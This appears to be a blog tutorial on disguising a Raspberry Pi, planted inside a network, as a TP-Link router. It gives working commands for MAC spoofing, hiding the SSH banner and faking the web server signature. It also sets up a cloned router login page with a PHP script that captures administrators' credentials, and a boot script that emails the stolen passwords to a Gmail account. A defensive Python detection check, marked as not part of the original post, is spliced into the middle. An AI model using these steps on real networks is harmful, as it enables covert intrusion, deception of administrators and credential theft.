Masking a Raspberry Pi to look and act like a router

This post continues the story of on-site infiltration of a local network with a Raspberry Pi (link).

When you infiltrate a serious network, one with a good security team and system admins who do their job properly, it is only a matter of time before they detect your hacking gadget. When the system admin performs a regular scan of the network and finds a new Raspberry Pi device, well, we can all imagine the expression on his face. So it is smart to mask the Pi to look like something else: a printer, a router, a Windows PC, etc. This will definitely attract less attention.

In this post I will focus on how to mask a Raspberry Pi to look and act like a router; in my case it will look like a TP-Link router. I will also create a phishing page imitating the router settings page, with the purpose of catching the admin's credentials in case he finds me and tries to log in, and I will set it up so that the harvested credentials are sent to my email.

For the purpose of this post I used a Raspberry Pi Zero W with two USB wifi antennas attached.

Here are brief steps we will focus on:

  • MAC spoofing of both antennas
  • Creating a wifi hotspot (password protected and unprotected)
  • Hiding the Debian version in the SSH banner
  • Changing the service name on port 80
  • Creating a phishing page – router settings page
  • Setting up email to receive harvested credentials

1. MAC spoof

Change the MAC address of both antennas to a TP-Link Technologies address. Type the following commands:

ifconfig wlan1 down
macchanger -m f8:d1:11:2a:24:a3 wlan1
ifconfig wlan1 up

ifconfig wlan2 down
macchanger -m f8:d1:11:2a:24:a4 wlan2
ifconfig wlan2 up

service network-manager restart

Note: after a reboot the MAC address is restored to the original one, so the best way to keep the spoofed MAC address is to create a script that runs at each boot.

2. Creating a wifi hotspot

You can create a password-protected or an unprotected wifi hotspot. For the unprotected one I found a great tool on GitHub which is really easy to set up, while creating a password-protected one is a little more time consuming.

2.1. Unprotected wifi hotspot

git clone https://github.com/oblique/create_ap
cd create_ap
make install

systemctl start create_ap

create_ap wlan2 wlan1 MyAccessPoint

2.2. Password-protected wifi hotspot

Install hostapd and dnsmasq, then stop both services:

sudo apt-get install hostapd
sudo apt-get install dnsmasq
service hostapd stop
service dnsmasq stop

Define the hotspot interface and the DHCP range in /etc/dnsmasq.conf:

interface=wlan2mon
dhcp-range=192.168.2.2,192.168.2.20,255.255.255.0,24h

Change the following settings in /etc/hostapd.conf. To define your wifi name change ssid, and to define the password change wpa_passphrase. Also be careful to set your own interface.

interface=wlan2mon
driver=nl80211
ssid=Wifi-name
hw_mode=g
channel=7
wmm_enabled=0
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=password
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP

Note: to get my wifi hotspot working I needed to put the wifi adapter into monitor mode, otherwise it did not work. I did it with the following command:

airmon-ng start wlan2

You also need to tell hostapd where the configuration file is stored. Add the following line to /etc/default/hostapd:

nano /etc/default/hostapd
DAEMON_CONF="/etc/hostapd.conf"

Now start up the services:

service hostapd start
service dnsmasq start

Now your hotspot is created but still does not provide internet access, so next you need to configure routing between the two wifi adapters. In my case wlan1 is connected to the internet, while wlan2 is used for the wifi hotspot.

Uncomment the following line in /etc/sysctl.conf to enable IPv4 packet forwarding:

net.ipv4.ip_forward=1

Run the following command to activate forwarding:

sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"

Turn the Raspberry Pi into the router:

iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE
iptables -A FORWARD -i wlan1 -o wlan2mon -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i wlan2mon -o wlan1 -j ACCEPT

After that, save the rules to /etc/iptables.ipv4.nat:

sh -c "iptables-save > /etc/iptables.ipv4.nat"

The following line should restore the rules whenever the Raspberry Pi boots. In my case they were not restored, because the restore at boot ran before wlan2 was put into monitor mode (wlan2mon), so that interface practically did not exist yet. It might work in some cases if you figure out how to run the hotspot without monitor mode. Anyway, here is the line to add to /etc/network/interfaces:

pre-up iptables-restore < /etc/iptables.ipv4.nat

Finally, you need to create a bash script that starts your hotspot. In my case I created hotspot.sh:

#!/bin/bash
ifconfig wlan2mon 192.168.2.1
service dnsmasq restart
hostapd /etc/hostapd.conf

3. Changing the service name on ports 22 and 80

For port 22 you should hide the Debian version in the SSH banner, so that the router is not associated with a Debian distro, which would look suspicious. To do this, add the following line to /etc/ssh/sshd_config:

DebianBanner no

Next, change the apache2 service name. Why should we change it? Well, when you scan a router it is not common to see an Apache service running on port 80. So in my case I changed it to TP-LINK WR841N WAP http config.

Install the following:

apt-get update
apt-get install libapache-mod-security
a2enmod mod-security

In /etc/apache2/conf-enabled/security.conf add the following line:

SecServerSignature "TP-LINK WR841N WAP http config"

Restart apache2:

service apache2 restart

OK, let's scan the Raspberry Pi to see how convincing it looks.

Well, it looks convincing to me.
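The blue-team counterpart of this section, as an added example that is not part of the original post: a small consistency check over scanner inventory records that flags hosts whose MAC vendor, SSH banner and HTTP fingerprint disagree, which is exactly the seam a disguised general-purpose box leaves open. The OUI table, the "embedded vendor" heuristics and the sample records are constructed assumptions for the example.

```python
import re

# Abbreviated, constructed OUI table; f8:d1:11 is the TP-Link prefix used in the post.
OUI_VENDOR = {"f8:d1:11": "TP-Link", "b8:27:eb": "Raspberry Pi Foundation"}
# Assumption: vendors whose consumer routers run embedded firmware, not a desktop distro.
EMBEDDED_ROUTER_VENDORS = {"TP-Link"}

# Constructed sample inventory: one disguised Pi and one plausible real router.
SAMPLE_HOSTS = [
    {"ip": "192.168.1.10", "mac": "f8:d1:11:2a:24:a3",
     "ssh_banner": "SSH-2.0-OpenSSH_7.4p1",
     "http_server": "TP-LINK WR841N WAP http config",
     "http_body": "<address>Apache/2.4.25 (Debian) Server at 192.168.1.10 Port 80</address>"},
    {"ip": "192.168.1.1", "mac": "f8:d1:11:00:11:22",
     "ssh_banner": "", "http_server": "Router Webserver",
     "http_body": "<title>TL-WR841N</title>"},
]

def vendor_of(mac):
    """Map a MAC address to a vendor name via its 24-bit OUI prefix."""
    return OUI_VENDOR.get(mac.lower()[:8], "unknown")

def check_host(rec):
    """Return a list of inconsistency findings for one scanned host."""
    findings = []
    embedded = vendor_of(rec["mac"]) in EMBEDDED_ROUTER_VENDORS
    ssh = rec.get("ssh_banner", "")
    server = rec.get("http_server", "")
    body = rec.get("http_body", "")
    # A distro-stamped banner ("Debian-10+deb9u7", "Ubuntu") is not an embedded-firmware trait.
    if embedded and re.search(r"Debian|Ubuntu|deb\d", ssh):
        findings.append("distro-stamped SSH banner on an embedded-router OUI")
    # Heuristic (assumption): consumer routers ship Dropbear or no SSH, so OpenSSH stands out.
    if embedded and "OpenSSH" in ssh:
        findings.append("OpenSSH on an embedded-router OUI")
    # Rewriting the Server header does not rewrite Apache's default error-page footer.
    if embedded and "Apache" in body and "Apache" not in server:
        findings.append("Server header claims router firmware but error page names Apache")
    return findings

def scan_report(hosts=SAMPLE_HOSTS):
    """Map each flagged host's IP to its findings; consistent hosts are omitted."""
    return {h["ip"]: check_host(h) for h in hosts if check_host(h)}
```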

4. Creating a phishing page – router settings page

With the WebScrapBook plugin capture the page source and put it in /var/www/html.

After that, modify the index.html file by adding or changing the action attribute of the form (action="action.php"). This runs action.php when the form is submitted, i.e. on a login attempt.

Create the action.php file and save it in /var/www/html:

<?php
$location = '/error';
header("Location: " . "http://" . $_SERVER['HTTP_HOST'] . $location);
$handle = fopen("pass.txt", "a");
foreach ($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n\n\n\n");
fclose($handle);
exit;
?>

As you can see in this code, after the login attempt it redirects you to the /error folder. In this folder you can create a new index.html file that renders e.g. "You have no authority to access this router". All harvested credentials are saved in the pass.txt file.

5. Setting up email to receive harvested credentials

To receive the harvested credentials in your email (Gmail account) you can use ssmtp.

Install ssmtp:

apt-get install ssmtp

Then add the following lines to the configuration file /etc/ssmtp/ssmtp.conf, changing the AuthUser and AuthPass lines:

hostname=localhost
UseSTARTTLS=YES
root=prodevtool@gmail.com
mailhub=smtp.gmail.com:587
FromLineOverride=YES
AuthUser=youreamail@gmail.com
AuthPass=Password
UseTLS=YES

Note: in the Gmail account settings you need to allow less secure apps to access your account.

Now you need to create a script, set to run at boot, which checks every 20 seconds whether the pass.txt file exists; if it does, it greps the username and password from it and sends them to your Gmail account.

#!/bin/bash
while sleep 20
do
    if [ -f /var/www/html/pass.txt ]
    then
        grep -e user -e pass /var/www/html/pass.txt | ssmtp youreamail@gmail.com
        rm -f /var/www/html/pass.txt
    fi
done
